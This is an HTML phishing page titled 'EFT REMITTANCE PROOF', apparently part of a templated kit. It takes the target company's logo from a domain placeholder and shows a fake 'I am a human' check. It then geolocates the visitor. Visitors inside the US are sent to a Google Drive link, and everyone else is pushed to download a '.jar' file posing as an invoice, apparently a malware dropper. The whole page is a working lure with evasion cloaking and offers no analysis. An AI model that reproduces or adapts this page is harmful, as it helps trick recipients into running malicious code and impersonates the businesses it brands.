<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <title>EFT REMITTANCE PROOF</title>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
        }
        .background-container {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            height: 100%;
            width: 100%;
            overflow: hidden;
        }
        .background-container::before {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            height: 100%;
            width: 100%;
            background-image: url('https://logo.clearbit.com/[[-Domain-]]'); /* Replace with image URL */
            background-size: cover;
            background-position: center;
            filter: blur(8px);
            z-index: -1;
        }
        .overlay {
            position: relative;
            padding: 20px;
            color: white;
            text-align: center;
            background-color: rgba(0, 0, 0, 0.5);
        }
        .checkbox-container {
            text-align: center;
            margin-top: 50px;
            font-size: 22px;
        }
        .checkbox-container input {
            width: 30px;
            height: 30px;
            vertical-align: middle;
            cursor: pointer;
        }
        .checkbox-container label {
            cursor: pointer;
            font-size: 24px;
            margin-left: 10px;
        }
        button {
            display: block;
            margin: 20px auto;
            padding: 15px 30px;
            font-size: 22px;
            cursor: pointer;
            border: none;
            border-radius: 8px;
            background-color: #4CAF50;
            color: white;
            transition: 0.3s;
        }
        button:hover {
            background-color: #45a049;
        }
        a:link, a:visited {
            background-color: #f44336;
            color: white;
            padding: 14px 25px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 20px;
            border-radius: 8px;
        }
        a:hover, a:active {
            background-color: red;
        }
    </style>
</head>
<body>

    <div class="checkbox-container">
        <input type="checkbox" id="humanCheck">
        <label for="humanCheck">I am a human</label>
        <button onclick="verifyHuman()">Verify</button>
    </div>

    <div class="background-container">
        <div class="overlay">
            <h1>TO VIEW THIS DOCUMENT, CLICK THE BUTTON BELOW TO DOWNLOAD IT.</h1>
            <a href="https://www.mediafire.com/file_premium/zclg62er1n5kt4x/Invoice-FA-43-03-2025.jar/file" download target="_blank">DOWNLOAD DOCUMENT</a>
        </div>
    </div>

<script>
    function verifyHuman() {
        let checkbox = document.getElementById("humanCheck");

        // Check if the box is checked
        if (checkbox.checked) {
            // Get user's IP and check location using ip-api.com (no API key required)
            fetch('http://ip-api.com/json')
                .then(response => response.json())
                .then(data => {
                    const country = data.country;

                    // Check if country is not US (if it's US, redirect to www.test.com)
                    if (country && country.toUpperCase() !== 'US') {
                        document.querySelector('.background-container').style.display = 'block';
                        document.querySelector('.checkbox-container').style.display = "none";
                    } else {
                        window.location.href = "https://drive.google.com/file/d/1kaW-o2QIPfHRAQ4_-7P3BEv8LLDhG7D2/view"; // Redirect to www.test.com if IP is from US
                    }
                })
                .catch(error => {
                    console.error('Error fetching IP data:', error);
                    window.location.href = "https://www.test.com"; // Redirect on error
                });
        } else {
            alert("Check the box to confirm that you are a human.");
        }
    }
</script>

</body>
</html>
